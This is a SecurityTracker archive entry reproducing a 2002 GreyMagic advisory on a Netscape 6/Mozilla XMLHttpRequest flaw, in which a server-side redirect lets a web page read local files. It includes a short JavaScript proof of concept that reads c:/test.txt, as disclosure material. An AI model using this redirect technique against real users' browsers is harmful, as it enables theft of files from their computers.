SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Web Browser)  >   Netscape Vendors:   America Online, Inc.
Netscape Browser XMLHTTP Redirect Bug Lets Remote Users View Files on a User's Computer
SecurityTracker Alert ID:  1004186
SecurityTracker URL:  http://securitytracker.com/id/1004186
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Apr 30 2002
Impact:   Disclosure of system information, Disclosure of user information
Exploit Included:  Yes  
Version(s): 6.1 and above
Description:   An access control vulnerability was reported in the Netscape browser. A remote user can supply HTML that, when loaded, will be able to view the contents of files on the victim's computer.

GreyMagic Software reported that Netscape (6.1+) on Windows is vulnerable but that other versions and platforms are also believed to be vulnerable.

The vulnerability reportedly exists in the XMLHTTP component "XMLHttpRequest object" and is similar to a previously disclosed flaw in Microsoft Internet Explorer.

A remote user can apparently write HTML that will direct the "open" method to a web page that will in turn redirect the browser to a local file while Netscape will continue to operate as if in the original security zone. As a result, the code will be able to read the file by using the responseText property.

A demonstration exploit example is provided. The code reportedly attempts to read the file "c:/test.txt". The page "getFile.asp" internally redirects to "file://c:/test.txt":

var oXML=new XMLHttpRequest();
oXML.open("GET","getFile.asp",false);
oXML.send(null);
alert(oXML.responseText);

The vendor has reportedly been notified.

Impact:   A remote user can supply HTML to the target user so that, when loaded by the target user, the code will be able to access files on the target user's computer.
Solution:   No solution was available at the time of this entry.
Vendor URL:  browsers.netscape.com/browsers/main.tmpl (Links to External Site)
Cause:   Access control error, State error
Underlying OS:  Linux (Any), Apple (Legacy "classic" Mac), UNIX (macOS/OS X), Windows (Any)

Message History:   This archive entry has one or more follow-up message(s) listed below.
(Vendor Confirms and Offers Workaround) Re: Netscape Browser XMLHTTP Redirect Bug Lets Remote Users View Files on a User's Computer
The vendor has confirmed the vulnerability and indicates that a patch is pending.
(Vendor Issues Fix) Re: Netscape Browser XMLHTTP Redirect Bug Lets Remote Users View Files on a User's Computer
The vendor has issued a fix



 Source Message Contents

Subject:  Reading local files in Netscape 6 and Mozilla (GM#001-NS)


GreyMagic Security Advisory GM#001-NS
=====================================

By GreyMagic Software, Israel.
30 Apr 2002.

Available in HTML format at http://security.greymagic.com/adv/gm001-ns/.

Topic: Reading local files in Netscape 6 and Mozilla.

Discovery date: 30 Mar 2002.

Affected applications:
======================

* All tested versions of Mozilla (0.9.7+) on Windows, other
versions/platforms are believed to be vulnerable.

* All tested versions of Netscape (6.1+) on Windows, other
versions/platforms are believed to be vulnerable.


Important notes:
================

Netscape was contacted on 24 Apr 2002 through a form on their web site and
through email to security@netscape.com and secure@netscape.com.

They did not bother to respond AT ALL, and we think we know why.

A while ago Netscape started a "Bug Bounty" program, which entitles
researchers who find a bug that allows an attacker to run unsafe code or
access files to a $1000 reward.

By completely disregarding our post Netscape has earned themselves a $1000
and lost any credibility they might have had. The money is irrelevant, but
using such a con to attract researchers into disclosing bugs to Netscape is
extremely unprofessional.

Netscape's faulty conducts made us rethink our disclosure guidelines and we
came to the following decisions:

* Release all future Netscape advisories without notifying Netscape at all.

* Advise the security community to do the same. Netscape is deceiving
researchers and should not be rewarded.

* Advise customers to stop using Netscape Navigator through our security
advisories and business contacts.


[1] http://home.netscape.com/security/bugbounty.html


Introduction:
=============

XMLHTTP is a component that is primarily used for retrieving XML documents
from a web server.

On 15 Dec 2001 "Jelmer" published an advisory titled "MSIE6 can read local
files", which demonstrated how Microsoft's XMLHTTP component allows reading
of local files by blindly following server-side redirections (patched by
MS02-008).

[1] http://www.xs4all.nl/~jkuperus/bug.htm
[2] http://www.microsoft.com/technet/security/bulletin/MS02-008.asp

Discussion:
===========

Mozilla's version of XMLHTTP, the XMLHttpRequest object, is vulnerable to
the exact same attack.

By directing the "open" method to a web page that will redirect to a
local/remote file it is possible to fool Mozilla into thinking it's still in
the allowed zone, therefore allowing us to read it.

It is then possible to inspect the content by using the responseText
property.


Exploit:
========

This example attempts to read "c:/test.txt", "getFile.asp" internally
redirects to "file://c:/test.txt":

var oXML=new XMLHttpRequest();
oXML.open("GET","getFile.asp",false);
oXML.send(null);
alert(oXML.responseText);


Solution:
=========

Users of Netscape Navigator should move to a better performing, less buggy
browser.


Tested on:
==========

Mozilla 0.9.7, NT4.
Mozilla 0.9.9, NT4.
Mozilla 0.9.9, Win2000.
Netscape 6.1, NT4.
Netscape 6.2.1, Win2000.
Netscape 6.2.2, NT4.
Netscape 6.2.2, Win2000.


Demonstration:
==============

A fully dynamic proof-of-concept demonstration of this issue is available at
http://security.greymagic.com/adv/gm001-ns/.


Feedback:
=========

Please mail any questions or comments to security@greymagic.com.


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC